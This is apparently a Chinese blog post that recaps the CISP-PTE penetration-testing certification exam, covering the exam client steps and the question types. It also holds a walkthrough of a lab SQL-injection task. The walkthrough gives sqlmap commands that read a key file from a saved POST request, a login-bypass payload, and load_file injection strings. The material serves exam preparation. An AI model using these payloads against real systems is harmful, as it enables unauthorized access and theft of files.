当前位置: 首页 > news >正文

cisp-pte考试复盘

考试客户端下载-->点击进入考试>输入密码->进去可以看见一个qax的登录框【监考员会告知账户密码】->进入考试页面

里面的操作题,点击开始答题,能看见一个题有一个攻击机,这时我们需要点击鼠标左键,看见一个控制台,点击控制台才能进入答题【双击是没有用的】

注:数度要慢,可以等,但是不能一直点,因为考试环境是win7

题型
选择题:全是单选

每个人的选择题不一样

第一题:sql注入

方法一:sqlmap -r 跑post包

登录框,直接抓包,复制整个包下来保存为.txt文件

再使用sqlmap -r 1.txt 跑出注入类型

再输入sqlmap.py -r 1.txt --file-read /key得到key值

如果没有跑出来就在后面加 --level=5 --risk=3 --batch

方法二:手工注入

先万能密码登录

admin' or 1=1#

在患者编辑处,找到电话的位置填写

1',comefrom=(select load_file('/key'))#
或者
1',comefrom=(select load_file('/key')) -- 1

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • C# 根据MySQL数据库中数据,批量删除OSS上的垃圾文件
  • Linux(离线)内网部署 thingsboard-gateway 网关实战modbus通讯
  • 【docker快捷部署系列二】用docker-compose快速配置多个容器,docker部署Springboot+Vue项目和mysql数据库
  • Python | Leetcode Python题解之第329题矩阵中的最长递增路径
  • 手写Redis缓存系统,第三章:持久化-增加可靠性
  • SuccBI+低代码文档中心 — 可视化分析(仪表板)(下)
  • Linux-Shell入门-05
  • 白骑士的Matlab教学实战项目篇 4.3 控制系统设计
  • 保研考研机试攻略:第一章——从零开始
  • 怎样才算精通 Excel?
  • linux之网络子系统-GRO机制分析
  • 09正弦稳态电路的分析
  • C语言学习笔记 Day10(指针--中)
  • 13.StringRedisTemplete使用
  • 巧用Array.forEach:简化循环与增强代码可读性;Array.forEach怎么用;面对大量数据时怎么提高Array.forEach的性能
  • JavaScript-如何实现克隆(clone)函数
  • JS 中的深拷贝与浅拷贝
  • Angular 4.x 动态创建组件
  • angular2 简述
  • angular组件开发
  • es的写入过程
  • LintCode 31. partitionArray 数组划分
  • springMvc学习笔记(2)
  • TypeScript实现数据结构(一)栈,队列,链表
  • 从0搭建SpringBoot的HelloWorld -- Java版本
  • 个人博客开发系列:评论功能之GitHub账号OAuth授权
  • 更好理解的面向对象的Javascript 1 —— 动态类型和多态
  • 欢迎参加第二届中国游戏开发者大会
  • 前端面试之CSS3新特性
  • 前嗅ForeSpider采集配置界面介绍
  • 如何进阶一名有竞争力的程序员?
  • 使用阿里云发布分布式网站,开发时候应该注意什么?
  • 试着探索高并发下的系统架构面貌
  • 算法-插入排序
  • 一起来学SpringBoot | 第三篇:SpringBoot日志配置
  • 用Visual Studio开发以太坊智能合约
  • 在Docker Swarm上部署Apache Storm:第1部分
  • 字符串匹配基础上
  • RDS-Mysql 物理备份恢复到本地数据库上
  • 测评:对于写作的人来说,Markdown是你最好的朋友 ...
  • 积累各种好的链接
  • ​​​​​​​​​​​​​​汽车网络信息安全分析方法论
  • # 手柄编程_北通阿修罗3动手评:一款兼具功能、操控性的电竞手柄
  • (16)Reactor的测试——响应式Spring的道法术器
  • (MTK)java文件添加简单接口并配置相应的SELinux avc 权限笔记2
  • (vue)el-checkbox 实现展示区分 label 和 value(展示值与选中获取值需不同)
  • (编译到47%失败)to be deleted
  • (超简单)使用vuepress搭建自己的博客并部署到github pages上
  • (免费分享)基于springboot,vue疗养中心管理系统
  • (一)【Jmeter】JDK及Jmeter的安装部署及简单配置
  • (一)eclipse Dynamic web project 工程目录以及文件路径问题
  • (一)WLAN定义和基本架构转
  • (一)搭建springboot+vue前后端分离项目--前端vue搭建
  • (转)iOS字体
  • (转)菜鸟学数据库(三)——存储过程